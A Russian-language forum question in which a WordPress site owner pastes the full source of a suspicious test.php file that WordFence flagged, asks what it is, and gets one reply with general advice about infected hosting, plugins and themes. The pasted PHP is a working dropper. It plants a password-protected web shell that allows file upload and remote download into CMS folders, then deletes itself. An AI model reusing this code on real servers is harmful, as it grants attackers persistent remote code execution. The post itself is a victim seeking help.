@vangelder

Возможно новый вирус на wordpress?

Сайт на wordpress, стоит WordFence...
и сегодня начал ругаться на файл в корне test.php со следующим содержанием:
<?php 
$randStr = str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890');
$rand = substr($randStr,0,6);
$htm='<?php error_reporting(0); $path = __DIR__; if($_GET["login"]=="'.$rand.'"){if(isset($_FILES["uploadedfile"])){ $target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"],$target_path)){echo "<font color=\"green\">file uploaded</font><br />";}else{echo "<font color=\"red\">upload fail</font><br />";}} echo "<form enctype=\"multipart/form-data\" method=\"POST\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>"; function get($url, $dir){ $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $data = curl_exec($ch); if(!$data){ $data = @file_get_contents($url);} file_put_contents($dir, $data);} if($_GET["url"]){ $url = $_GET["url"]; preg_match("/(.*)\/(.*)\.(.*?)$/",$url,$n); if($n[3]=="txt"){ $z="php"; $name=$n[2]; }else{ $z=$n[3]; $name="moban"; } if($_GET["dir"]){ $dir=$_SERVER["DOCUMENT_ROOT"]."/".$_GET["dir"]."/".$name.".".$z; }else{ $dir=$_SERVER["DOCUMENT_ROOT"]."/".$name.".".$z;} get($url,$dir); if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}}elseif($_POST["url"]){ $url = $_POST["url"]; preg_match("/(.*)\/(.*)\.(.*?)$/",$url,$n); if($n[3]=="txt"){ $z="php"; $name=$n[2];}else{$z=$n[3]; $name="moban";} $dir = $_POST["path"]."/".$name.".".$z; get($url,$dir); if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}}echo "<tr><td><form method=\"POST\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"$path\"><input type=submit value=\"Download\"></form></td></tr>";} ?>';
$home = $_SERVER['SERVER_NAME'];
$RootDir = $_SERVER['DOCUMENT_ROOT'];
if(is_dir($RootDir . "/wp-admin/user")){
	file_put_contents($RootDir . "/wp-admin/user/updater.php", $htm);
	$url1 = "http://".$home."/wp-admin/user/updater.php?login=".$rand;
	echo '<meta http-equiv="Refresh" content="0; url='.$url1.'">';
}
else if(is_dir($RootDir . "/modules/mod_search")){
	file_put_contents($RootDir . "/modules/mod_search/updater.php", $htm);
	$url2 = "http://".$home."/modules/mod_search/updater.php?login=".$rand;
	echo '<meta http-equiv="Refresh" content="0; url='.$url2.'">';
}
else if(is_dir($RootDir . "/includes/database")){
	file_put_contents($RootDir . "/includes/database/updater.php", $htm);
	$url3 = "http://".$home."/includes/database/updater.php?login=".$rand;
	echo '<meta http-equiv="Refresh" content="0; url='.$url3.'">';
}
else if(is_dir($RootDir . "/manager/controllers")){
	file_put_contents($RootDir . "/manager/controllers/updater.php", $htm);
	$url4 = "http://".$home."/manager/controllers/updater.php?login=".$rand;
	echo '<meta http-equiv="Refresh" content="0; url='.$url4.'">';
}else {
	if(!is_dir($RootDir . "/templates"))
	mkdir($RootDir . "/templates",0777);
	if(!is_dir($RootDir . "/templates/atomic"))
	mkdir($RootDir . "/templates/atomic",0777);
	file_put_contents($RootDir . "/templates/atomic/templates.php", $htm);
	$url5 = "http://".$home."/templates/atomic/templates.php?login=".$rand;
	echo '<meta http-equiv="Refresh" content="0; url='.$url5.'">';
}
unlink("./test.php");


Гуглил... ничего не нашел.... может кто сталкивался уже?

P.S. Данный файл разместился практически во всех папках хостинга (на других сайтах) и т.д.
  • Вопрос задан
  • 117 просмотров
Пригласить эксперта
Ответы на вопрос 1
Dizer7
@Dizer7
Создание сайтов wordpress
ну, такого файла не должно быть в корне установки вордпресс.
посмотрите внимательно, возможно на сайте, среди папок новые папки появились?

Еще можно сайт проверить с помощью др. сервисов.

Часто такие сюрпризы появляются из-за этого:
1) дырявый хостинг - вирусы с одного сайта переходят на др. в рамках сервера.
2) используются плагины взятые из сети
3) используются шаблоны взятые из сети

Как проверить свой шаблон на вирусы
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы